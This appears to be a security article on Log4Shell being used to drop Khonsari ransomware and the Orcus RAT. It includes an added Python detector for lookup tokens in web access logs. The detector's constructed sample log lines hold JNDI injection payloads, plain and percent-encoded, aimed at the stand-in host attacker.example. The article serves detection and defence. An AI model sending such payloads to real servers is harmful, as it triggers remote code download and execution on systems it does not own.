A new type of ransomware and a Remote Access Trojan (RAT) have been discovered being installed via the log4j vulnerability, also known as “Log4Shell.” Log4Shell, tracked as CVE-2021-44228, is a vulnerability in the log4j module, which is used extensively for logging in Java-based applications. The vulnerability allows an attacker to remotely send a specially crafted payload that, when logged by the receiving server, triggers a lookup function that fetches and executes a file from a remote location. This allows the attacker to execute arbitrary code on the targeted server.
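The mechanism described above, a payload that is only dangerous once it reaches the logger, means the attacker-controlled strings usually pass through a web server first, so access logs are a practical place to hunt for attempts. The following detector is an added example for this article, not code from the researchers or from the log4j project. It assumes web logs in combined-log format (request, referer and user-agent are the attacker-controlled fields), URL-decodes each field so percent-encoded payloads become visible, and flags any `${...}` lookup syntax rather than only the literal `jndi`, because log4j resolves nested lookups and a literal match alone is easy to miss. The sample log lines, client addresses and the `attacker.example` hostname are constructed for the demonstration.

```python
import re
import urllib.parse

# Constructed sample lines in combined-log format; none are from a real incident.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [11/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [11/Dec/2021:10:01:05 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - [11/Dec/2021:10:01:09 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.68"',
    '203.0.113.11 - - [11/Dec/2021:10:01:12 +0000] "GET /api HTTP/1.1" 200 12 "-" "app/1.0"',
    '203.0.113.13 - - [11/Dec/2021:10:01:15 +0000] "GET /price?amount=${total} HTTP/1.1" 200 10 "-" "app/1.0"',
]

# Combined log format: client, identity, user, [timestamp], "request", status, size, "referer", "user-agent".
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Any log4j-style lookup token. Matching on "${" rather than on "jndi" is the
# point: the logger expands nested lookups, so the literal may not appear verbatim.
LOOKUP_RE = re.compile(r'\$\{[^}]*\}')

# Fields the client controls and which a Java application is likely to log.
UNTRUSTED_FIELDS = ("request", "referer", "agent")


def normalize(field: str) -> str:
    """URL-decode up to three times so percent-encoded payloads are visible, then lowercase."""
    prev, cur = None, field
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, urllib.parse.unquote(cur)
    return cur.lower()


def classify_line(line: str):
    """Return None for unparseable lines, else the client and a list of (field, severity, lookup)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    for name in UNTRUSTED_FIELDS:
        value = normalize(m.group(name))
        for lookup in LOOKUP_RE.findall(value):
            # "jndi" after decoding is the strongest signal; any other lookup in
            # client-supplied data is still worth a look.
            severity = "high" if "jndi" in lookup else "medium"
            findings.append((name, severity, lookup))
    return {"client": m.group("client"), "findings": findings}


def scan(lines):
    """Return only the parsed lines that contain at least one lookup token."""
    alerts = []
    for line in lines:
        result = classify_line(line)
        if result and result["findings"]:
            alerts.append(result)
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG_LINES):
        for field, severity, lookup in alert["findings"]:
            print(f'{alert["client"]:>14}  {severity:<6} {field:<8} {lookup}')
```

Run against the constructed lines, the detector reports the plain user-agent payload, the percent-encoded one hidden in the query string, and, at lower severity, the `${total}` token in the last request, which is not a JNDI string but is still lookup syntax arriving from the network. Decoding is bounded to three rounds so a hostile input cannot make the scanner loop; tune the severity mapping to your own environment rather than treating "medium" as noise.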
The new ransomware, called Khonsari, targets vulnerable Java applications running on Windows operating systems. The ransomware uses the Log4Shell vulnerability to force the victim system to download an additional payload, which is the main ransomware payload of Khonsari. This malicious .NET binary then executes and encrypts all drives on the device, as well as all of the user’s personal directories, such as the Desktop and Downloads folders. The ransomware encrypts files with AES-128 in CBC mode and appends the extension “.khonsari” to each file. As is typical of ransomware, a ransom note is then created instructing the user to send the threat actor Bitcoin in order to get their files decrypted.
Researchers have also seen a RAT being installed via the Log4Shell vulnerability. This RAT, called Orcus, follows a similar infection pattern to the Khonsari ransomware: the Log4Shell vulnerability is used to force the victim to download and execute a secondary payload, which is the main Orcus malware dropper. From there, the Orcus malware establishes persistence via the Run registry key, then downloads shellcode from an external site and injects it into the conhost.exe process. The payload then starts beaconing to its command-and-control server, completing the infection.
The relative ease of exploiting Log4Shell makes it a prime target for threat actors, so more malware families are likely to be deployed using this vulnerability.